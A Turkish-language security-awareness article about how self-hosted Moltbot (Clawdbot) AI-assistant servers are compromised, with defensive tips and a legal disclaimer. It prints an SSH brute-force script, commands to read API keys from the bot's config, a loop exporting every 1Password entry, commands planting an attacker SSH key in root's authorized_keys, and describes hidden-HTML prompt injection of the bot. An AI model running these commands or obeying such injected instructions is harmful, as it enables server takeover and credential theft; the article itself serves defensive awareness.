Yapay zeka asistanı Moltbot (eski adıyla Clawdbot), teknik bilgisi olmayan kullanıcıların 5 dolarlık sunucularda kendi “Jarvis”lerini yaratmalarını sağladı. Ancak “vibecoding” akımıyla kurulan bu sistemlerin çoğu, temel güvenlik önlemlerinden yoksun.
Güvenlik araştırmacıları, bu sistemlerin nasıl ele geçirilebileceğini kanıtlayan kod parçacıklarını yayınladı. İşte bir yapay zeka asistanının tüm dijital hayatınızı nasıl ifşa edebileceğinin teknik anatomisi.
1. Basit şifreli sunucular Python betiğiyle dakikalar içinde düşüyor
Birçok kullanıcı, sanal sunucusunu (VPS) kurarken “123456” veya “root” gibi varsayılan şifreleri değiştirmiyor. Saldırganlar, Python tabanlı basit bir betik kullanarak bu sunucuları tarıyor ve içeri sızıyor.
Aşağıdaki kod, savunmasız bir sunucuya kaba kuvvet (brute force) saldırısının ne kadar basit kodlanabileceğini gösteriyor:
import paramiko
target = "123.45.67.89" # Hedef sunucu IP'si
passwords = [
"root", "password", "123456",
"TempPassword123", # Yaygın VPS varsayılan şifreleri
]
for pwd in passwords:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(target, username="root", password=pwd, timeout=5)
# Şifre zayıfsa 2-3 dakika içinde erişim sağlanır
Bu erişim sağlandığında, saldırgan cat ~/.clawdbot/config.json komutuyla tüm API anahtarlarınızı listeleyebilir.
2. İnternete açık kontrol panelleri şifresiz yakalanıyor
Moltbot’un kontrol paneli, doğru yapılandırılmazsa internete açık hale gelebiliyor. Shodan gibi arama motorlarında yapılan basit bir tarama, binlerce savunmasız paneli ortaya döküyor.
# Shodan üzerinde açık Moltbot panellerini arama komutu
shodan search "Clawdbot Control" --fields ip_str,port
Eğer kimlik doğrulama yoksa, saldırgan tarayıcıdan IP adresine giderek şu JSON çıktısını alıyor ve tüm anahtarlara erişiyor:
{
"status": "success",
"config": {
"anthropicApiKey": "sk-ant-api03-xxxxxxxxxxxxx",
"awsAccessKeyId": "AKIAIOSFODNN7EXAMPLE",
"stripeSecretKey": "sk_live_51Hxxxxxxxxxxxxxxxx"
}
}
3. Şifre yöneticinizi tek komutla boşaltmak
En korkutucu senaryolardan biri, sunucuda 1Password gibi yöneticilerin CLI (komut satırı) sürümünün yetkili olması. Saldırgan (veya kandırılmış bot), tek bir döngü komutuyla tüm şifrelerinizi bir dosyaya yazdırıp çalabilir.
Aşağıdaki komut, 1Password içindeki her bir kaydı JSON formatında dışarı aktarır:
for item in $(op item list --format json | jq -r '.[].id'); do
op item get $item --format json >> ~/all-passwords.json
done
Bu işlem sonucunda banka şifrelerinden kredi kartlarına kadar her şey all-passwords.json dosyasına kaydedilir.
4. “Prompt Enjeksiyonu” ile gizli komut çalıştırma
Saldırganlar, size gönderdikleri bir web sitesinin veya e-postanın içine “görünmez” talimatlar gizleyebilir. Siz bota “Bu sayfayı özetle” dediğinizde, bot aslında gizli bir HTML kodunu okur ve uygular.
5. Root yetkisiyle sistemi tamamen ele geçirme
Eğer botunuzu “root” yetkisiyle çalıştırıyorsanız (ki varsayılan kurulumlar bunu yapabilir), bot kendi sistemine kalıcı bir arka kapı (backdoor) ekleyebilir. Aşağıdaki komutla bot, saldırganın anahtarını yetkili anahtarlar listesine ekler:
mkdir -p /host/root/.ssh
echo "ssh-rsa AAAAB3NzaC..." >> /host/root/.ssh/authorized_keys
chmod 600 /host/root/.ssh/authorized_keys
Bu aşamadan sonra saldırgan, botu kapatsanız bile sunucunuza istediği zaman erişebilir.
Felakete davetiye çıkaran hatalı yapılandırma örneği
Tüm bu saldırıların başarılı olmasının temel nedeni, genellikle kullanıcıların yaptığı yapılandırma hatalarıdır. İşte “Hack #10” olarak adlandırılan ve bir sunucuyu saldırıya tamamen açık hale getiren o hatalı yapılandırma dosyası örneği:
SSH:
Password: "TempPassword123" # ❌ Varsayılan şifre bırakılmış
PermitRootLogin: yes # ❌ Root girişi açık (Büyük hata!)
Firewall:
enabled: false # ❌ Güvenlik duvarı kapalı
Clawdbot Configuration:
bind: "0.0.0.0" # ❌ Tüm internete açık
authentication: false # ❌ Şifre sormuyor!
Docker:
privileged: true # ❌ Bota tam sistem yetkisi verilmiş
volumes:
- "/:/host" # ❌ Ana dosya sistemi bota bağlanmış
Eğer yapılandırmanız buna benziyorsa, sunucunuzun ele geçirilmesi an meselesidir. Güvenli bir “vibecoding” deneyimi için clawdbot security audit --fix komutunu çalıştırmayı ihmal etmeyin.
Nasıl güvende kalırsınız?
Bu korkutucu senaryolardan korunmak için alınabilecek önlemler teknik bilgi gerektirse de hayati önem taşıyor:
- İzin listesi: Botun sadece sizin kullanıcı ID’nize yanıt vermesini sağlayın.
- Ayrı tarayıcı: Bot için kişisel hesaplarınızın açık olmadığı, izole bir tarayıcı profili kullanın.
- Root erişimi: Botu asla en yüksek yetki seviyesi olan “root” kullanıcısı ile çalıştırmayın.
Yapay zeka asistanları hayatımıza daha fazla girdikçe, güvenlik “olsa da olur” bir özellikten çıkıp bir zorunluluk haline geliyor. “Vibecoding” yaparken güvenliğinizi şansa bırakmayın.
⚠️ Yasal Uyarı ve Sorumluluk Reddi
Lütfen Dikkat: Bu makalede paylaşılan kod parçacıkları, komutlar ve saldırı senaryoları, yalnızca siber güvenlik farkındalığı oluşturmak, eğitim sağlamak ve sistem yöneticilerinin kendi altyapılarını test etmelerine yardımcı olmak amacıyla sunulmuştur.
Başkalarına ait sistemlere, ağlara veya verilere izinsiz erişim sağlamak, Türk Ceza Kanunu (TCK) ve uluslararası siber suç yasaları kapsamında ağır yaptırımları olan bir suçtur.
Bu bilgilerin kötü niyetli kullanımı, sistemlerde oluşabilecek veri kayıpları veya doğabilecek her türlü hukuki ve maddi zarardan, yazar veya yayın platformu kesinlikle sorumlu tutulamaz. Paylaşılan kodları asla yetkiniz olmayan sistemler üzerinde çalıştırmayınız.
